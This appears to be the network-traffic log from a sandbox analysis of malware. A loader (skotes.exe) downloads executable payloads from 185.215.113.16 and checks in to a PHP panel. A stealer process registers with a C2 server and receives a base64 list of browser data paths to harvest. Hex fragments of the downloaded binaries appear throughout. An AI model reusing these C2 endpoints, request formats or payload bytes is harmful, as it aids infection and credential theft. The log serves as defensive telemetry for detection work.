Nov 5, 2024 18:46:23.209870100 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49883	185.215.113.16	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:23.229654074 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 5, 2024 18:46:24.129446030 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:23 GMT Content-Type: application/octet-stream Content-Length: 2095616 Last-Modified: Tue, 05 Nov 2024 16:58:03 GMT Connection: keep-alive ETag: "672a4e9b-1ffa00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 50 71 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 71 00 00 04 00 00 8a bc 20 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng,Pq@q @P.d. p.v@.rsrc .@.idata .@ P).@kwdkpzgxPWJ@juauvnci@q@.taggant0Pq"@
Nov 5, 2024 18:46:24.129504919 CET	212	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:24.129515886 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:24.129524946 CET	12	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:24.129548073 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:24.129611015 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:24.129626036 CET	1236	IN	Data Raw: 33 8f 3a 8d e2 8d a8 82 d6 78 b5 62 8b c9 dc 7b aa 6c f1 e7 fe 1d 36 c1 b2 d0 ef 70 6c fe 22 c7 7a 4d ee a5 48 f0 f2 7d d5 c5 a1 af cb 2c 81 79 b6 8a d4 a0 3d 98 8f 7a a6 6e ed 38 c8 cb e8 bd be af a4 99 c2 af a4 99 a6 af a4 99 aa af a4 99 ae af Data Ascii: 3:xb{l6pl"zMH},y=zn8t0;x0d!Y;{(K1''74^qby-)y y Vz1d//Z}.'49q$8,-r.8F`;XLZ$mBgua
Nov 5, 2024 18:46:24.129637003 CET	1236	IN	Data Raw: bb a7 38 4b 5a a1 59 69 fa be 8e 31 2e 1b f3 3e 1a a8 21 3a b7 b7 bd 14 1c 38 64 1d d7 ae 38 1f 7f 54 03 2a 40 ac 3e 03 08 cf 00 88 bb 20 82 4e 30 5c a2 b0 8f 05 f1 c5 00 a4 01 ba 58 fa 2d 20 14 6e 35 af 5f 29 a5 b5 fd 2d 77 f1 d7 31 f1 55 e9 70 Data Ascii: 8KZYi1.>!:8d8T*@> N0\X- n5_)-w1Up1M'by(P'>"98u4nB#`\/5>+/+wb`,d~_GG56Cuy\!.39:\|!7uatm>vY
Nov 5, 2024 18:46:24.129673958 CET	1236	IN	Data Raw: ea 48 b1 50 b6 54 2a 52 8a 6b ac 9b 0e ae 7d 39 0f 15 a1 85 88 3d 69 5d e9 9c 18 0a 00 6e 71 9e af 9a b4 5f 8e c4 b6 a8 0e 08 b2 71 4f f4 de 19 e9 14 1d 72 ee 15 10 3c e8 98 db 31 df a4 f8 85 04 3d 5d 5c e9 1f 19 6a ff 6e cd 9e 0b 9e 44 fd f1 9c Data Ascii: HPTRk}9=i]nq_qOr<1=]\jnDj$UIthtO^]67"v{WP1!W$;`81C]~ P9teD9Bc$64f'}uNa!j'F)n19m$;
Nov 5, 2024 18:46:24.129690886 CET	1236	IN	Data Raw: 95 66 bd 90 f3 24 14 af 02 80 fa 48 d1 e9 d0 3d b9 fc a1 a8 c6 24 e1 3b e8 1c d6 31 b7 a4 e0 85 cd 3d 9d 5b f8 f1 e2 a3 0a 15 91 9f f4 f5 0c 5e 99 e6 50 a8 f6 b0 b8 b4 28 30 d6 a9 0e f8 b9 b5 3c 0e 45 b1 d7 08 03 90 0b 6e fe c5 ff 04 23 df df 50 Data Ascii: f$H=$;1=[^P(0<En#P){6CFn~}$.i~tg$;@9[82k@~)"\8&!C2A)Z(thqP^B3<zT &nU=F$C2)
Nov 5, 2024 18:46:24.135601997 CET	1236	IN	Data Raw: 0f a5 b6 7c 02 c2 ba 09 00 1c 75 39 97 c8 04 19 a1 a4 02 7a ff 1d f0 f6 da 6a 9c 70 1e 15 82 7e f8 f2 08 66 b5 aa 22 ba c9 6e 31 9f eb 9e 38 60 f9 14 bd a8 ea 0e 35 87 4b 2e fc ab ae fc bc a8 b6 0d 54 c4 fe a8 fc 5d fc 8e 64 c5 ff a4 22 e8 df e4 Data Ascii: \|u9zjp~f"n18`5K.T]d"9bZ$;(z=n>1Q`1;R=$T}9hPA5nH^N]2nv/n(it1x]0VSp 8\vA<8\|QEU0*PG2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49900	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:28.455790997 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 31 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004155001&unit=246122658369
Nov 5, 2024 18:46:29.338336945 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49904	185.215.113.16	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:29.398214102 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 5, 2024 18:46:30.324487925 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:30 GMT Content-Type: application/octet-stream Content-Length: 919552 Last-Modified: Tue, 05 Nov 2024 16:52:19 GMT Connection: keep-alive ETag: "672a4d43-e0800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3b 4d 2a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@n~{{{z{RichPEL;Mg"Xw@`a@@@d\|@(u4@.text `.rdata@@.datalpH@.rsrc(@@@.relocuv@B
Nov 5, 2024 18:46:30.324513912 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Nov 5, 2024 18:46:30.324527025 CET	324	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Nov 5, 2024 18:46:30.324537039 CET	1236	IN	Data Raw: e8 2e e8 01 00 8b f3 c7 87 2c fd ff ff 40 c9 49 00 59 39 9f 34 fd ff ff 0f 87 f0 0f 04 00 ff b7 30 fd ff ff 89 9f 34 fd ff ff e8 04 e8 01 00 59 8b 8f 24 fd ff ff 85 c9 0f 85 f9 0f 04 00 8d b7 10 fd ff ff 8b ce c7 06 3c c9 49 00 e8 a3 01 00 00 ff Data Ascii: .,@IY9404Y$<IvY-l\L_^[`t
Nov 5, 2024 18:46:30.324584961 CET	1236	IN	Data Raw: 0f 85 72 0c 04 00 56 6a 40 e8 18 e3 01 00 59 ff 75 08 8b f0 8b ce e8 11 00 00 00 8b 4f 04 89 4e 38 89 77 04 5e ff 07 5f 5d c2 04 00 55 8b ec 56 8b 75 08 57 8b f9 56 83 67 08 00 e8 eb e5 00 00 8a 46 10 8d 4f 20 88 47 10 8b 46 14 89 47 14 8a 46 18 Data Ascii: rVj@YuON8w^_]UVuWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q Q(Q0V&NW LjE$\|I I
Nov 5, 2024 18:46:30.324595928 CET	1236	IN	Data Raw: 00 00 56 50 ff 75 0c ff 75 08 e8 a8 cc 00 00 85 c0 78 0f 8d 4d ec e8 16 00 00 00 8b 4d 10 33 f6 88 01 8d 4d ec e8 ed af 00 00 8b c6 5e c9 c2 0c 00 8b 41 0c 83 e8 01 74 29 83 e8 01 0f 84 d4 07 04 00 83 e8 01 0f 84 bb 07 04 00 83 e8 01 74 19 83 e8 Data Ascii: VPuuxMM3M^At)ttH9AxUSVu3WyQ>t(M@f9Xu8!tt_^3[]U3BSVWPPUUJ(MO1f~u
Nov 5, 2024 18:46:30.324610949 CET	1236	IN	Data Raw: 03 04 00 80 bd 75 ff ff ff 00 8b 45 c0 0f 85 7b 03 04 00 8b 18 8d 8d 6c ff ff ff e8 65 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 45 fc 85 c0 0f 88 7f 05 04 00 3b fb 0f 84 26 fe ff ff e9 72 05 04 00 83 38 05 0f 85 d0 fe ff ff ff 45 f4 8d 45 ec 89 7d Data Ascii: uE{lepEE;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uEuuSPuWAjYf9HEHOTE
Nov 5, 2024 18:46:30.324628115 CET	1236	IN	Data Raw: c3 55 8b ec 8b 45 08 85 c0 0f 8f 88 01 04 00 83 7d 0c 00 0f 85 a9 01 04 00 83 7d 10 00 75 34 83 7d 14 00 0f 85 b8 01 04 00 83 7d 18 00 0f 85 b7 01 04 00 83 7d 1c 00 0f 85 b6 01 04 00 83 7d 20 00 75 19 83 7d 24 00 0f 85 7e 01 04 00 33 c0 5d c2 20 Data Ascii: UE}}u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~F<BN$;\|SA23~,FDMEuNGA;\|u[_FM
Nov 5, 2024 18:46:30.324639082 CET	1236	IN	Data Raw: 22 fe 03 00 8b d6 8b ce e8 90 0c 00 00 8b d6 8b ce e8 8a ff ff ff ff 75 0c 51 56 8b cf e8 71 07 00 00 59 50 56 8b cf e8 77 16 00 00 5f 5e c9 c2 10 00 55 8b ec 83 ec 74 53 56 33 db 8d 4d 94 57 89 5d 90 e8 14 7b 00 00 ff 75 08 8d 4d 90 c7 45 a4 34 Data Ascii: "uQVqYPVw_^UtSV3MW]{uME4I]]]]xMMEhIM'nj5MM]]]& ]MiVMzEPM@hIMmSjEPEP/yMihtI
Nov 5, 2024 18:46:30.324649096 CET	1236	IN	Data Raw: ca 01 00 8b f8 59 8d 77 04 8b ce e8 78 76 00 00 8b 55 08 8d 83 84 01 00 00 c1 e2 04 03 c2 89 7d fc 3b f0 74 08 50 8b ce e8 c1 75 00 00 8b 45 08 8d 8b 8c 00 00 00 89 07 8d 45 fc 50 e8 07 00 00 00 5f 5e 5b c9 c2 04 00 55 8b ec 56 6a 08 8b f1 e8 ad Data Ascii: YwxvU};tPuEEP_^[UVjUYa~uNN^]FHUVEPPh1hIEt3fP7^VVYtf\|F\u3fLF^UVW
Nov 5, 2024 18:46:30.329627037 CET	1236	IN	Data Raw: 00 6a ff 8b ce 8d 50 01 40 f7 d8 1b c0 23 c2 50 e8 f0 5b 00 00 5e 5d c2 04 00 55 8b ec 83 ec 10 53 8b c1 56 57 33 f6 89 45 f8 8b 78 04 89 7d f0 8d 57 ff 85 ff 74 4b 8b 45 08 0f b7 00 89 45 fc 33 db 33 c9 66 85 c0 74 30 8b 45 f8 8b 7d 08 8b 00 0f Data Ascii: jP@#P[^]USVW3Ex}WtKEE33ft0E}PEEf9Et#C_fu}!_^[AUSVWh3D$D$SP9uM9uM9uM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49909	185.215.113.206	80	3688	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:31.411267996 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 5, 2024 18:46:32.333456993 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 18:46:32.337251902 CET	412	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGD Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 35 41 31 31 32 44 45 45 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 2d 2d 0d 0a Data Ascii: ------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="hwid"E55A112DEE9E487256326------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="build"tale------CBFIJEGIDBGIECAKKEGD--
Nov 5, 2024 18:46:32.639533997 CET	407	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:32 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 6d 55 32 5a 57 49 78 4f 47 45 79 5a 54 6c 6d 59 7a 64 6c 5a 6a 55 34 59 7a 52 6d 4e 44 6b 30 5a 6a 4d 30 4d 32 4d 35 4d 54 45 33 5a 6d 4d 77 4d 32 59 34 4e 6a 45 31 4e 54 51 34 4e 6a 4e 6b 4e 32 51 35 4d 6a 42 69 59 57 46 6d 4e 6d 56 6b 4e 44 6b 34 4d 32 46 6d 4f 57 4e 68 4d 47 51 7a 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MmU2ZWIxOGEyZTlmYzdlZjU4YzRmNDk0ZjM0M2M5MTE3ZmMwM2Y4NjE1NTQ4NjNkN2Q5MjBiYWFmNmVkNDk4M2FmOWNhMGQzfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 5, 2024 18:46:32.641047001 CET	470	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGH Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 2d 2d 0d 0a Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="message"browsers------AFHIEBKKFHIEGCAKECGH--
Nov 5, 2024 18:46:32.928981066 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:32 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2064 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 58 45 64 76 62 32 64 73 5a 56 78 63 51 32 68 79 62 32 31 6c 58 46 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 63 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4d 48 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 57 31 70 5a 32 39 38 58 45 46 74 61 57 64 76 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEdvb2dsZVxcQ2hyb21lXFxBcHBsaWNhdGlvblxcfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8MHxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8QW1pZ298XEFtaWdvXFVzZXIgRGF0YXxjaHJvbWV8MHwwfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfDB8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8JUxPQ0FMQVBQREFUQSVcXFZpdmFsZGlcXEFwcGxpY2F0aW9uXFx8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8MHxFcGljUHJpdmFjeUJyb3dzZXJ8XEVwaWMgUHJpdmFjeSBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8ZXBpYy5leGV8JUxPQ0FMQVBQREFUQSVcXEVwaWMgUHJpdmFjeSBCcm93c2VyXFxBcHBsaWNhdGlvblxcfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicm93c2VyLmV4ZXxDOlxcUHJvZ3JhbSBGaWxlc1xcQ29jQ29jXFxCcm93c2VyXFxBcHBsaWNhdGlvblxcfEJyYXZlfFxCcmF2ZVNvZnR3YXJlXEJyYXZlLUJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicmF2ZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEJyYXZlU29mdHdhcmVcXEJyYXZlLUJyb3dz
Nov 5, 2024 18:46:32.929085970 CET	1056	IN	Data Raw: 5a 58 4a 63 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 46 78 38 51 32 56 75 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 Data Ascii: ZXJcXEFwcGxpY2F0aW9uXFx8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcXENlbnRCcm93c2VyXFxBcHBsaWNhdGlvblxcfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXI
Nov 5, 2024 18:46:32.930401087 CET	469	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGID Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 2d 2d 0d 0a Data Ascii: ------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="message"plugins------DBKKKEHDHCBFIEBFBGID--
